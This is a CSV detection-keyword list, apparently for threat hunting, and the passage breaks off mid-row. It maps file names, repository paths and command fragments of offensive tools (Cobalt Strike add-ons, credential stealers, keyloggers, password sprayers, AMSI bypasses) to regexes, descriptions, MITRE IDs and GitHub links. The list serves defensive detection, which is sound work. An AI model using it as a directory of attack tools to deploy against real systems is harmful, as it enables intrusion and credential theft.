"*Office-DDE-Payloads*",".{0,1000}Office\-DDE\-Payloads.{0,1000}","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","623","162","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" "*Offline_WinPwn.ps1*",".{0,1000}Offline_WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*offlinereg-win32.exe*",".{0,1000}offlinereg\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*offlinereg-win64.exe*",".{0,1000}offlinereg\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*offsecginger/koadic*",".{0,1000}offsecginger\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*OFTC/tor2web/*",".{0,1000}OFTC\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*",".{0,1000}OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA\=.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*OG-Sadpanda/SharpCat*",".{0,1000}OG\-Sadpanda\/SharpCat.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","17","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*OG-Sadpanda/SharpZippo*",".{0,1000}OG\-Sadpanda\/SharpZippo.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" "*Oh365UserFinder.git*",".{0,1000}Oh365UserFinder\.git.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*oh365userfinder.py*",".{0,1000}oh365userfinder\.py.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*Oh365UserFinder-main*",".{0,1000}Oh365UserFinder\-main.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*oh-az/NoArgs*",".{0,1000}oh\-az\/NoArgs.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*ojggmchlghnjlapmfbnjholfjkiidbch*",".{0,1000}ojggmchlghnjlapmfbnjholfjkiidbch.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Okta-Password-Sprayer*",".{0,1000}Okta\-Password\-Sprayer.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","1","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" "*oldboy21/LDAP-Password-Hunter*",".{0,1000}oldboy21\/LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*oldboy21/SMBAT*",".{0,1000}oldboy21\/SMBAT.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*oldboy21/SMBSR*",".{0,1000}oldboy21\/SMBSR.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*OLDNamedPipeServer.ps1*",".{0,1000}OLDNamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*OleViewDotNet.psd1*",".{0,1000}OleViewDotNet\.psd1.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*Oliver-1-1/GhostMapper*",".{0,1000}Oliver\-1\-1\/GhostMapper.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*OlivierLaflamme/PyExec*",".{0,1000}OlivierLaflamme\/PyExec.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*OmerYa/Invisi-Shell*",".{0,1000}OmerYa\/Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*-OMG-Credz-Plz*",".{0,1000}\-OMG\-Credz\-Plz.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*OMGdump.zip*",".{0,1000}OMGdump\.zip.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*OMGLoggerDecoder*",".{0,1000}OMGLoggerDecoder.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*omg-payloads*/payloads/*",".{0,1000}omg\-payloads.{0,1000}\/payloads\/.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*omg-payloads-master*",".{0,1000}omg\-payloads\-master.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*OmriBaso/BesoToken*",".{0,1000}OmriBaso\/BesoToken.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*On_Demand_C2.*",".{0,1000}On_Demand_C2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*On-Demand_C2_BOF.*",".{0,1000}On\-Demand_C2_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*OnDemandC2Class.cs*",".{0,1000}OnDemandC2Class\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*onecloudemoji/CVE-2022-30190*",".{0,1000}onecloudemoji\/CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","106","29","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*OneDrive Enumerator*",".{0,1000}OneDrive\sEnumerator.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*onedrive_enum.py*",".{0,1000}onedrive_enum\.py.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*onedrive_exports_version_dll.txt*",".{0,1000}onedrive_exports_version_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*onedrive_user_enum.git*",".{0,1000}onedrive_user_enum\.git.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*One-Lin3r*",".{0,1000}One\-Lin3r.{0,1000}","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/One-Lin3r","1","1","N/A","N/A","10","1640","292","2022-02-10T18:17:57Z","2018-01-14T21:26:04Z" "*onesixtyone -c *snmp_default_pass.txt*",".{0,1000}onesixtyone\s\-c\s.{0,1000}snmp_default_pass\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*onesixtyone -c *wordlists/*",".{0,1000}onesixtyone\s\-c\s.{0,1000}wordlists\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*onesixtyone -i * -c*",".{0,1000}onesixtyone\s\-i\s.{0,1000}\s\-c.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*onesixtyone.1*",".{0,1000}onesixtyone\.1.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*onesixtyone.git*",".{0,1000}onesixtyone\.git.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*onionpipe --*",".{0,1000}onionpipe\s\-\-.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe *.onion:*",".{0,1000}onionpipe\s.{0,1000}\.onion\:.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe *:*~*",".{0,1000}onionpipe\s.{0,1000}\:.{0,1000}\~.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe /run/*",".{0,1000}onionpipe\s\/run\/.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe 8000*",".{0,1000}onionpipe\s8000.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*onionpipe client new *",".{0,1000}onionpipe\sclient\snew\s.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as 